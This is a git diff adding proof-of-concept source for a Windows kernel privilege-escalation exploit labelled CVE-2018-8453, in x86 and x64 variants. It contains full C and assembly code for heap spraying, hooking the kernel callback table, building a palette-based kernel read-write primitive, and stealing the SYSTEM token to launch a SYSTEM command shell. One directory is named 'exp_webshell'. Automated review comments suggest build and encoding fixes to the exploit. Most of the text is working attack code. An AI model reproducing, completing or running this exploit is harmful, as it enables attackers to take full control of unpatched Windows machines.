+ ReadMem(buf[0], 16);
+ ReadMem(buf[0], 16);
+ res = buf[0];
+ }
+ return res;
+}
+
+HPALETTE CreatePaletteOfSize(int size, DWORD value) {
+ int pal_cnt = (size - 0x60) / 4;
+ int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY);
+ LOGPALETTE *lPalette = (LOGPALETTE*)malloc(palsize);
+ memset(lPalette, value, palsize);
+ lPalette->palNumEntries = pal_cnt;
+ lPalette->palVersion = 0x300;
+ return CreatePalette(lPalette);
+}
+
+
+HACCEL hAccel_0xC10_top[2000];
+HACCEL hAccel_0x50_middle[3000];
+HACCEL hAccel_0x3B0_bottom[2000];
+HACCEL hAccel_ReusePalette[8000];
+HDC hDC_Writer[3000];
+HPALETTE hPalettes[10000];
+
+void BeforSBTrackAlloc() {
+
+ for (int i = 0; i < 3000; i++) {
+ hDC_Writer[i] = CreateCompatibleDC(NULL);
+ }
+
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0xC10_top[i] = CreateAcceleratorTableW(lpAccel, 0x1FD);
+ }
+
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0x3B0_bottom[i] = CreateAcceleratorTableW(lpAccel, 0x95);
+ }
+
+ for (int i = 0; i < 3000; i++) {
+ hAccel_0x50_middle[i] = CreateAcceleratorTableW(lpAccel, 8);
+ }
+ for (int i = 1000; i < 3000; i += 2) {
+ DestroyAcceleratorTable(hAccel_0x50_middle[i]);
+ }
+}
+
+void _cdecl AfterSBTrackAlloc() {
+ for (int i = 0; i < 3000; i++) {
+ DestroyAcceleratorTable(hAccel_0x50_middle[i]);
+ }
+ //������Ϣ,ϵͳ�ͷ�SBTrack;
+ SendMessage(hSBWNDnew, WM_CANCELMODE, 0, 0);
+ //�ͷ�0x3a0��ռ�ÿռ�,��0x3a0�������SBTrack(size=0x50)�ϲ�Ϊ0x3f0��С;
+ for (int i = 0; i < 2000; i++) {
+ DestroyAcceleratorTable(hAccel_0x3B0_bottom[i]);
+ }
+
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], 0x7D);
+ }
+}
+
+void FindManagerAndWorker() {
+
+ for (int i = 0; i < 2000; i++) {
+ DestroyAcceleratorTable(hAccel_0xC10_top[i]);
+ }
+ for (int i = 0; i < 3000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0xb30, 0x66);
+ }
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0x50_middle[i] = CreateAcceleratorTableW(lpAccel, 0x26);
+ }
+ for (int i = 3000; i < 10000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0x100, 0x88);
+ }
+
+ *((DWORD *)flag) = 0x501;
+ *((DWORD *)flag + 1) = 0xFFFF;
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], 1);
+ }
+ memset(buf, 0, 0x240 * 4);
+ for (int i = 3000; i < 10000; i++) {
+ if (GetPaletteEntries(hPalettes[i], 0x2B, 80, (LPPALETTEENTRY)buf)) {
+ hKeep = hPalettes[i];
+ hManager = (HPALETTE)*buf;
+ hWorker = (HPALETTE)*(buf + 64);
+ *(buf + 5) = 0xFFFF;
+ *(buf + 69) = 0xFFFF;
+ SetPaletteEntries(hPalettes[i], 0x2B, 80, (LPPALETTEENTRY)buf);
+ }
+ }
+
+ *((DWORD *)flag) = 0x501;
+ *((DWORD *)flag + 1) = 0x28;
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], 1);
+ if (!hKeepDC && (!GetPaletteEntries(hKeep, 0x2B, 80, (LPPALETTEENTRY)buf))) {
+ hKeepDC = hDC_Writer[i];
+ }
+ }
+}
+
+void GetSystem() {
+
+ ULONG SelfToken = 0;
+ ULONG SystemToken = 0;
+ DWORD ACCELHandle = 0;
+ DWORD SystemEPS;
+ DWORD CurrentEPS;
+ DWORD pKernelHandleTable;
+
+ STARTUPINFO stStartUpInfo = { sizeof(stStartUpInfo) };
+ PROCESS_INFORMATION pProcessInfo;
+ WCHAR cmd[] = L"c:\\\\windows\\\\system32\\\\cmd.exe";
+
+ printf("[*] Find Manager and Worker.\n");
+ FindManagerAndWorker();
+ SystemEPS = PsInitialSystemProcess();
+ CurrentEPS = PsGetCurrentProcess(SystemEPS);
+ pKernelHandleTable = GetKernelHandleTable();
+
+ ReadMem(SystemEPS + gConfig.TokenOffset, 16);
+ SystemToken = buf[0];
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = CurrentEPS + gConfig.TokenOffset;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+
+ GetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SelfToken);
+ SetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SystemToken);
+
+ Sleep(500);
+ printf("[*] Swaping shell.\n\n");
+ ZeroMemory(&stStartUpInfo, sizeof(STARTUPINFO));
+ stStartUpInfo.cb = sizeof(STARTUPINFO);
+ stStartUpInfo.dwFlags = STARTF_USESHOWWINDOW;
+ stStartUpInfo.wShowWindow = 1;
+ CreateProcess(cmd, NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &stStartUpInfo, &pProcessInfo);
+ Sleep(1000);
+ SetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SelfToken);
+
+ for (int i = 3000; i < 10000; i++) {
+ if ((hPalettes[i] != hManager) && (hPalettes[i] != hWorker)) {
+ DeleteObject(hPalettes[i]);
+ }
+ }
+ for (int i = 0; i < 8000; i++) {
+ hAccel_ReusePalette[i] = CreateAcceleratorTableW(lpAccel, 0x22);
+ }
+
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ ReadMem(buf[20] - 0x1f0, 16);
+ ACCELHandle = buf[0];
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = pKernelHandleTable + (ACCELHandle & 0xffff) * 8;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+
+ DeleteDC(hKeepDC);
+
+ buf[0] = 0;
+ buf[1] = 0;
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)buf);
+}
+
+void fnDWORDCallBack(PDWORD msg) {
+
+ if (bMSGSENT && *msg) {
+ bMSGSENT = FALSE;
+ printf("[*] Destroy Window.\n");
+ DestroyWindow(hMainWND);
+ }
+
+ if (*msg && (*(msg + 1) == 0x70) && (*((DWORD*)(*msg)) == (DWORD)hMainWND)) {
+ printf("[*] ReAlloc Memory.\n");
+ _asm pushad;
+ AfterSBTrackAlloc();
+ _asm popad;
+ }
+ fnDWORD(msg);
+}
+
+void fnClientFreeWindowClassExtraBytesCallBack(PDWORD msg) {
+
+ if ((HWND)*(msg + 3) == hMainWND) {
+ hSBWNDnew = CreateWindowEx(0, L"ScrollBar", L"SB", SWP_HIDEWINDOW | SB_HORZ, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
+ printf("[*] Set Window FNID.\n");
+ SetWindowFNID(hMainWND, 0x2A1);
+ SetCapture(hSBWNDnew);
+ }
+ fnClientFreeWindowClassExtraBytes(msg);
+}
+
+int main()
+{
+ printf("\n");
+ printf("////////////////////////////////////////////////////////\n");
+ printf("// //\n");
+ printf("// CVE-2018-8453 EXPLOIT //\n");
+ printf("// Date : 2019/1/15 //\n");
+ printf("// Author: ze0r //\n");
+ printf("////////////////////////////////////////////////////////\n\n");
+
+ DWORD OldProtect = 0;
+ _asm {
+ push eax;
+ mov eax, fs:[0x30];
+ lea eax, [eax + 0x2c];
+ mov eax, [eax];
+ mov CallbackTb, eax;
+ pop eax;
+ }
+ VirtualProtect(CallbackTb, 512, PAGE_READWRITE, &OldProtect);
+ CallbackTb += 2;
+ fnDWORD = (fct_fnDispatch)*CallbackTb;
+ *CallbackTb = (DWORD)fnDWORDCallBack;
+
+ CallbackTb += 126;
+ fnClientFreeWindowClassExtraBytes = (fct_fnDispatch)*CallbackTb;
+ *CallbackTb = (DWORD)fnClientFreeWindowClassExtraBytesCallBack;
+
+ VirtualProtect(CallbackTb, 512, OldProtect, &OldProtect);
+ SystemCallStub = (DWORD)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "KiFastSystemCall");
+ lpAccel = (LPACCEL)malloc(sizeof(ACCEL) * 2);
+ SecureZeroMemory(lpAccel, sizeof(ACCEL));
+
+ WNDCLASSEXW wndClass = { 0 };
+ wndClass = { 0 };
+ wndClass.cbSize = sizeof(WNDCLASSEXW);
+ wndClass.lpfnWndProc = DefWindowProc;
+ wndClass.cbClsExtra = 0;
+ wndClass.cbWndExtra = 1;
+ wndClass.hInstance = GetModuleHandleA(NULL);
+ wndClass.lpszMenuName = NULL;
+ wndClass.lpszClassName = L"WNDCLASSMAIN";
+
+ RegisterClassExW(&wndClass);
+ printf("[*] CreateWindow.\n");
+ hMainWND = CreateWindowW(L"WNDCLASSMAIN", L"CVE", WS_DISABLED, 0, 0, 0, 0, nullptr, nullptr, GetModuleHandleA(NULL), nullptr);
+ hSBWND = CreateWindowEx(0, L"ScrollBar", L"SB", WS_CHILD | WS_VISIBLE | SBS_HORZ, 0, 0, 3, 3, hMainWND, NULL, GetModuleHandleA(NULL), NULL);
+ SetScrollRange(hSBWND, SB_CTL, 0, 3, TRUE);
+ SetScrollPos(hSBWND, SB_CTL, 3, TRUE);
+ ShowWindow(hMainWND, SW_SHOW);
+ UpdateWindow(hMainWND);
+
+ ///////////////////////////////////////////////////////////////////////////////////
+ //��ռ�þ��������֮�ֳط�ˮʱ������Ķ�����������Ҳ���
+ for (int i = 0; i < 10000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0xa0, 0x22);
+ }
+ for (int i = 9990; i >= 0; i--) {
+ DeleteObject(hPalettes[i]);
+ }
+ ///////////////////////////////////////////////////////////////////////////////////
+ printf("[*] Deploy Memory.\n");
+ BeforSBTrackAlloc();
+ printf("[*] SendMessage.\n");
+
+ bMSGSENT = TRUE;
+ SendMessage(hSBWND, WM_LBUTTONDOWN, 0, 0x00020002);
+
+ GetSystem();
+
+ free(lpAccel);
+ return TRUE;
+}
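Review bot: the comment above the palette spray loop (`//��ռ�þ...`) is mojibake, so the one line meant to explain why 10000 palettes are created and indices 9990..0 are freed is unreadable as committed; re-save exp.cpp as UTF-8 (MSVC accepts UTF-8 with BOM) so the intent survives in the repository. Two smaller points in `main`: `SecureZeroMemory(lpAccel, sizeof(ACCEL))` clears only the first of the two `ACCEL` structures allocated on the line before it, so `sizeof(ACCEL) * 2` is what was meant; and `return TRUE` makes the process exit with status 1, which callers read as failure, so the success path should return 0.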
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.vcxproj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.vcxproj
new file mode 100644
index 0000000..418e0c9
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.vcxproj
@@ -0,0 +1,165 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}
+ Win32Proj
+ exp
+ 8.1
+
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Use
+ Level3
+ Disabled
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreadedDebug
+
+
+ Console
+ true
+
+
+
+
+ Use
+ Level3
+ Disabled
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+ Create
+ Create
+ Create
+ Create
+
+
+
+
+
+
\ No newline at end of file
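Review bot: the two Win32 configurations set the static runtime (`MultiThreadedDebug` and `MultiThreaded`) while the two x64 configurations (the blocks with `_DEBUG;_CONSOLE` and `NDEBUG;_CONSOLE` without `WIN32`) leave the runtime library at its default, so x64 builds depend on the VC140 redistributable being present on the machine; pick one setting for all four configurations or state the difference in the README. Separately, only the element values of this .vcxproj survive in the rendered hunk, not the element names, so confirm the committed file is the well-formed MSBuild XML it needs to be.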
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.vcxproj.filters b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.vcxproj.filters
new file mode 100644
index 0000000..aafdea0
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.vcxproj.filters
@@ -0,0 +1,36 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+
+
+
+ 头文件
+
+
+ 头文件
+
+
+
+
+ 源文件
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/stdafx.cpp b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/stdafx.cpp
new file mode 100644
index 0000000..f026e66
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : ֻ�����������ļ���Դ�ļ�
+// exp.pch ����ΪԤ����ͷ
+// stdafx.obj ������Ԥ����������Ϣ
+
+#include "stdafx.h"
+
+// TODO: �� STDAFX.H �������κ�����ĸ���ͷ�ļ���
+//�������ڴ��ļ�������
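Review bot: every comment in this file is mojibake (`ֻ�����...`), which means the wizard-generated source was committed in a non-UTF-8 code page; convert these files to UTF-8 before committing or drop the comments, since a reviewer cannot read them as shown. The same byte-identical file (blob f026e66) is added again under exp_x64_palette_length, as are stdafx.h and targetver.h, so the two projects could share one copy of the scaffolding.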
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/stdafx.h b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/stdafx.h
new file mode 100644
index 0000000..baa4bbc
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/stdafx.h
@@ -0,0 +1,15 @@
+// stdafx.h : ��ϵͳ�����ļ��İ����ļ���
+// ���Ǿ���ʹ�õ��������ĵ�
+// �ض�����Ŀ�İ����ļ�
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include
+#include
+
+
+
+// TODO: �ڴ˴����ó�����Ҫ������ͷ�ļ�
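Review bot: the two `#include` directives near the end of the hunk carry no header name as rendered; an `#include` with no operand is a compile error, so confirm the committed file still has the angle-bracketed names and that only the rendering lost them. The comment block has the same encoding problem as stdafx.cpp.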
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/targetver.h b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/targetver.h
new file mode 100644
index 0000000..416cebf
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// ���� SDKDDKVer.h ��������õ���߰汾�� Windows ƽ̨��
+
+// ���ҪΪ��ǰ�� Windows ƽ̨����Ӧ�ó�������� WinSDKVer.h������
+// �� _WIN32_WINNT ������ΪҪ֧�ֵ�ƽ̨��Ȼ���ٰ��� SDKDDKVer.h��
+
+#include
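Review bot: the final `#include` has no header name as shown; the garbled comment above it still visibly names SDKDDKVer.h and WinSDKVer.h, so that is the line to check against the committed file. The comment block itself is mojibake for the same reason as stdafx.cpp.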
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/ipch/EXP-7a579913/EXP-12a44d53.ipch b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/ipch/EXP-7a579913/EXP-12a44d53.ipch
new file mode 100644
index 0000000..e609501
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/ipch/EXP-7a579913/EXP-12a44d53.ipch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/ipch/EXP-7a579913/EXP-c8e60a99.ipch b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/ipch/EXP-7a579913/EXP-c8e60a99.ipch
new file mode 100644
index 0000000..4adff5a
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/ipch/EXP-7a579913/EXP-c8e60a99.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/.vs/exp/v14/.suo b/CVE-2018-8453/exp_x64_palette_length/.vs/exp/v14/.suo
new file mode 100644
index 0000000..8054913
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/.vs/exp/v14/.suo differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp.VC.db b/CVE-2018-8453/exp_x64_palette_length/exp.VC.db
new file mode 100644
index 0000000..15de77d
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp.VC.db differ
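Review bot: `.suo`, `exp.VC.db` and the `ipch/*.ipch` files are Visual Studio per-user state and IntelliSense caches, not source; they are large binaries that change on every IDE session and carry nothing a reader of the analysis needs. Remove them from the commit and add `.vs/`, `*.VC.db` and `ipch/` to a .gitignore so they do not come back.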
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp.sln b/CVE-2018-8453/exp_x64_palette_length/exp.sln
new file mode 100644
index 0000000..49eb848
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "exp", "exp\exp.vcxproj", "{34B233E1-7209-49FD-8DB8-69A9C75906D6}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Debug|x64.ActiveCfg = Debug|x64
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Debug|x64.Build.0 = Debug|x64
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Debug|x86.ActiveCfg = Debug|Win32
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Debug|x86.Build.0 = Debug|Win32
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Release|x64.ActiveCfg = Release|x64
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Release|x64.Build.0 = Release|x64
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Release|x86.ActiveCfg = Release|Win32
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/ReadMe.txt b/CVE-2018-8453/exp_x64_palette_length/exp/ReadMe.txt
new file mode 100644
index 0000000..5b66131
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/ReadMe.txt
@@ -0,0 +1,30 @@
+========================================================================
+ 控制台应用程序:exp 项目概述
+========================================================================
+
+应用程序向导已为您创建了此 exp 应用程序。
+
+本文件概要介绍组成 exp 应用程序的每个文件的内容。
+
+
+exp.vcxproj
+ 这是使用应用程序向导生成的 VC++ 项目的主项目文件,其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
+
+exp.vcxproj.filters
+ 这是使用“应用程序向导”生成的 VC++ 项目筛选器文件。它包含有关项目文件与筛选器之间的关联信息。在 IDE 中,通过这种关联,在特定节点下以分组形式显示具有相似扩展名的文件。例如,“.cpp”文件与“源文件”筛选器关联。
+
+exp.cpp
+ 这是主应用程序源文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他标准文件:
+
+StdAfx.h, StdAfx.cpp
+ 这些文件用于生成名为 exp.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他注释:
+
+应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
+
+/////////////////////////////////////////////////////////////////////////////
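Review bot: this ReadMe.txt is the unmodified Visual Studio wizard text describing exp.vcxproj, exp.vcxproj.filters, exp.cpp and StdAfx.*; it says nothing about what exp_x64_palette_length is or which Windows build it was tested against. Either delete it or replace it with project-specific notes (target build, what distinguishes this variant from exp-x86_pool_fengshui) that the top-level README.md currently only links out for.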
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/_asm.asm b/CVE-2018-8453/exp_x64_palette_length/exp/_asm.asm
new file mode 100644
index 0000000..e3a8637
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/_asm.asm
@@ -0,0 +1,36 @@
+public GetKernelCallbackTableBase
+public FuncInt3
+public SetWindowFNID
+_TEXT SEGMENT
+
+GetKernelCallbackTableBase PROC
+ ;int 3
+ mov rax,gs:[60h]
+ lea rax,[rax+58h]
+ mov rax,[rax]
+ ret
+GetKernelCallbackTableBase ENDP
+
+FuncInt3 PROC
+ int 3
+ ret
+FuncInt3 ENDP
+
+SetWindowFNID PROC
+ mov r10,rcx;
+ mov r11,rdx;
+ mov eax,1095h;
+ syscall;
+ ret;
+SetWindowFNID ENDP
+
+SetLinkedUFIs PROC
+ mov r10,rcx;
+ mov eax,12EAh;
+ syscall;
+ ret;
+SetLinkedUFIs ENDP
+
+END
+
+
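Review bot: `SetLinkedUFIs` is missing from the `public` list at the top of the file even though exp.cpp declares it `EXTERN_C` and calls it; MASM makes `PROC` symbols public by default so it links, but then the three `public` lines are redundant and the list misleads a reader about what the module exports, so make it complete or drop it. The immediates `1095h` and `12EAh`, and the `gs:[60h]`/`58h` offsets, are tied to one Windows build and nothing in the change records which one; a comment naming the build here and next to `VersionSpecificConfig` in exp.cpp is needed for anyone checking the analysis. The leftover `;int 3` and the trailing `;` after each instruction are noise.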
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/exp.cpp b/CVE-2018-8453/exp_x64_palette_length/exp/exp.cpp
new file mode 100644
index 0000000..7e6e4b3
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/exp.cpp
@@ -0,0 +1,437 @@
+#include "stdafx.h"
+#include
+#include
+#include
+#include
+#pragma comment(lib, "Psapi.lib")
+
+BOOL bMSGSENT = FALSE;
+HWND hMainWND;
+HWND hSBWND;
+HWND hSBWNDnew;
+HWND hReuseWND;
+
+HPALETTE hManager;
+HPALETTE hWorker;
+ULONG64 MgrAddr, WrkAddr;
+ULONG64 CurrentTagCLSAddr;
+
+CHAR SBTrackBUF[0x80];
+TCHAR MenuName[0xff0];
+HDC hDC_Writer[3000];
+ACCEL acckey[0x0D] = { 0 };
+HACCEL hAccels[1000];
+HACCEL hAccel;
+
+typedef void*(NTAPI *lHMValidateHandle)(HWND h, int type);
+lHMValidateHandle pHmValidateHandle = NULL;
+
+typedef unsigned __int64 QWORD, *PQWORD;
+typedef QWORD DT;
+
+typedef struct _HEAD
+{
+ HANDLE h;
+ DWORD cLockObj;
+} HEAD, *PHEAD;
+
+typedef struct _THROBJHEAD
+{
+ HEAD h;
+ PVOID pti;
+} THROBJHEAD, *PTHROBJHEAD;
+
+typedef struct _THRDESKHEAD
+{
+ THROBJHEAD h;
+ PULONG64 rpdesk;
+ ULONG64 pSelf; // points to the kernel mode address
+} THRDESKHEAD, *PTHRDESKHEAD;
+
+typedef struct
+{
+ QWORD UniqueProcessIdOffset;
+ QWORD TokenOffset;
+} VersionSpecificConfig;
+
+VersionSpecificConfig gConfig = { 0x2e0, 0x358 };
+
+EXTERN_C PULONG64 GetKernelCallbackTableBase();
+EXTERN_C VOID FuncInt3();
+EXTERN_C VOID SetWindowFNID(HWND hWnd, LONG64 FNID);
+EXTERN_C VOID SetLinkedUFIs(HDC hDC,PULONG64 addr, LONG64 length);
+
+typedef ULONG64(WINAPI *fct_fnDispatch64)(PULONG64);
+fct_fnDispatch64 fnDWORD, fnClientFreeWindowClassExtraBytes;
+
+BOOL FindHMValidateHandle() {
+ HMODULE hUser32 = LoadLibraryA("user32.dll");
+ if (hUser32 == NULL) {
+ printf("Failed to load user32");
+ return FALSE;
+ }
+
+ BYTE* pIsMenu = (BYTE *)GetProcAddress(hUser32, "IsMenu");
+ if (pIsMenu == NULL) {
+ printf("Failed to find location of exported function 'IsMenu' within user32.dll\n");
+ return FALSE;
+ }
+ unsigned int uiHMValidateHandleOffset = 0;
+ for (unsigned int i = 0; i < 0x1000; i++) {
+ BYTE* test = pIsMenu + i;
+ if (*test == 0xE8) {
+ uiHMValidateHandleOffset = i + 1;
+ break;
+ }
+ }
+ if (uiHMValidateHandleOffset == 0) {
+ printf("Failed to find offset of HMValidateHandle from location of 'IsMenu'\n");
+ return FALSE;
+ }
+
+ unsigned int addr = *(unsigned int *)(pIsMenu + uiHMValidateHandleOffset);
+ unsigned int offset = ((unsigned int)pIsMenu - (unsigned int)hUser32) + addr;
+ pHmValidateHandle = (lHMValidateHandle)((ULONG_PTR)hUser32 + offset + 11);
+
+ return TRUE;
+}
+
+HPALETTE CreatePaletteOfSize(int size, DWORD value) {
+ int pal_cnt = (size - 0x90) / 4;
+ int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY);
+ LOGPALETTE *lPalette = (LOGPALETTE*)malloc(palsize);
+ memset(lPalette, value, palsize);
+ lPalette->palNumEntries = pal_cnt;
+ lPalette->palVersion = 0x300;
+ return CreatePalette(lPalette);
+}
+
+ULONG64 alloccate_free_window()
+{
+ HMODULE hInst = GetModuleHandleA(0);
+ TCHAR strclassname[32] = { 0x41 };
+ WNDCLASSEX wnd = { 0x0 };
+ wnd.cbSize = sizeof(wnd);
+ wnd.lpszClassName = strclassname;
+ wnd.lpfnWndProc = DefWindowProc;
+ wnd.hInstance = hInst;
+ wnd.lpszMenuName = MenuName;
+ RegisterClassExW(&wnd);
+
+ HWND hTmpWnd = CreateWindowEx(
+ 0,
+ wnd.lpszClassName,
+ TEXT("WORDS"),
+ 0xcf0000,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ NULL, NULL, hInst, NULL);
+ PTHRDESKHEAD tagWND = (PTHRDESKHEAD)pHmValidateHandle(hTmpWnd, 1);
+ ULONG64 p = (ULONG64)tagWND;
+ ULONG64 kernellpSelp = tagWND->pSelf;
+ ULONG64 ulClientDelta = kernellpSelp - p;
+ ULONG64 kernelTagCLS = *(ULONG64*)(p + 0xa8);
+ ULONG64 userTagCLS = kernelTagCLS - ulClientDelta;
+ ULONG64 tagCLS_lpszMenuName = (ULONG64)(*((ULONG64*)(userTagCLS + 0x98)));
+ DestroyWindow(hTmpWnd);
+ UnregisterClass(strclassname, hInst);
+ return tagCLS_lpszMenuName;
+}
+
+ULONG64 GetMangerPalette()
+{
+ ULONG64 Previous, Current;
+ Previous = alloccate_free_window();
+ while (TRUE)
+ {
+ Current = alloccate_free_window();
+ if ((Current == Previous) && (Current != 0))
+ {
+ hManager = CreatePaletteOfSize(0xfe8,0x88);
+ return Current;
+ }
+ Previous = Current;
+ }
+}
+
+ULONG64 GetWorkerPalette()
+{
+ ULONG64 Previous, Current;
+ Previous = alloccate_free_window();
+ while (TRUE)
+ {
+ Current = alloccate_free_window();
+ if (Current == Previous && Current != 0)
+ {
+ hWorker = CreatePaletteOfSize(0xfe8, 0x88);
+ return Current;
+ }
+ Previous = Current;
+ }
+}
+
+VOID GetMangerAndWorker() {
+
+ int i;
+ HPALETTE Padding[0x1000];
+ for (i = 0; i < 0x1000; i++) {
+ MgrAddr = GetMangerPalette();
+ WrkAddr = GetWorkerPalette();
+ if ((WrkAddr - MgrAddr) > 0x1000) {
+ Padding[i] = CreatePaletteOfSize(0x7e0, 0x41);
+ }
+ else {
+ break;
+ }
+ }
+ if (i == 0x1000) {
+ printf("Error! Cann't get Manger and Worker");
+ }
+ printf("[*] Manager: 0x%p\n[*] Worker: 0x%p\n", MgrAddr, WrkAddr);
+ for (; i > 0; i--) {
+ DeleteObject(Padding[i]);
+ }
+ memset(SBTrackBUF, 0x44, 0x80);
+ //*(PULONG64)(SBTrackBUF + sizeof(ULONG64)) = WrkAddr + 0x79 - 8;
